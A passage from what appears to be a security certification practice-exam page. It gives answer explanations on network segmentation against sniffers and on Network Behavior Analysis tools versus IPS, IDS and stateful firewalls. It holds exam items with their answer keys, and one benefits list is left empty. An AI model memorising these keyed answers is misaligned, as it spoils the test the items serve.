Logical network segmentation can mitigate the attacker’s ability to gain further information by limiting the visibility and access of the sniffer to the segment where it is installed. A sniffer is a tool that captures and analyzes the data packets that are transmitted over a network. A sniffer can be used for legitimate purposes, such as troubleshooting, testing, or monitoring the network, or for malicious purposes, such as eavesdropping, stealing, or modifying the data. A sniffer can only capture the data packets that are within its broadcast domain, which is the set of devices that can communicate with each other without a router. By implementing logical network segmentation at the switches, the organization can create multiple broadcast domains and isolate the sensitive or critical data from the compromised segment. This way, the attacker can only see the data packets that belong to the same segment as the sniffer, and not the data packets that belong to other segments. This can prevent the attacker from gaining further information or accessing other resources on the network.
The other options are not the most effective layers of security the organization could have implemented to mitigate the attacker’s ability to gain further information, but rather layers that have other limitations or drawbacks. Implementing packet filtering on the network firewalls is not the most effective layer of security, because packet filtering only examines the network layer header of the data packets, such as the source and destination IP addresses, and does not inspect the payload or the content of the data. Packet filtering can also be bypassed by using techniques such as IP spoofing or fragmentation. Installing Host Based Intrusion Detection Systems (HIDS) is not the most effective layer of security, because HIDS only monitors and detects the activities and events on a single host, and does not prevent or respond to the attacks. HIDS can also be disabled or evaded by the attacker if the host is compromised. Requiring strong authentication for administrators is not the most effective layer of security, because authentication only verifies the identity of the users or processes, and does not protect the data in transit or at rest. Authentication can also be defeated by using techniques such as phishing, keylogging, or credential theft.
Which of the following is the BEST network defense against unknown types of attacks or stealth attacks in progress?
Intrusion Prevention Systems (IPS)
Intrusion Detection Systems (IDS)
Stateful firewalls
Network Behavior Analysis (NBA) tools
Network Behavior Analysis (NBA) tools are the best network defense against unknown types of attacks or stealth attacks in progress. NBA tools are devices or software that monitor and analyze the network traffic and activities, and detect any anomalies or deviations from the normal or expected behavior. NBA tools use various techniques, such as statistical analysis, machine learning, artificial intelligence, or heuristics, to establish a baseline of the network behavior, and to identify any outliers or indicators of compromise. NBA tools can provide several benefits, such as:
The other options are not the best network defense against unknown types of attacks or stealth attacks in progress, but rather network defenses that have other limitations or drawbacks. Intrusion Prevention Systems (IPS) are devices or software that monitor and block the network traffic and activities that match the predefined signatures or rules of known attacks. IPS can provide a proactive and preventive layer of security, but they cannot detect or stop unknown types of attacks or stealth attacks that do not match any signatures or rules, or that can evade or disable the IPS. Intrusion Detection Systems (IDS) are devices or software that monitor and alert the network traffic and activities that match the predefined signatures or rules of known attacks. IDS can provide a reactive and detective layer of security, but they cannot detect or alert unknown types of attacks or stealth attacks that do not match any signatures or rules, or that can evade or disable the IDS. Stateful firewalls are devices or software that filter and control the network traffic and activities based on the state and context of the network sessions, such as the source and destination IP addresses, port numbers, protocol types, and sequence numbers. Stateful firewalls can provide a granular and dynamic layer of security, but they cannot filter or control unknown types of attacks or stealth attacks that use valid or spoofed network sessions, or that can exploit or bypass the firewall rules.
TESTED 21 Nov 2024
Copyright © 2014-2024 ClapGeek. All Rights Reserved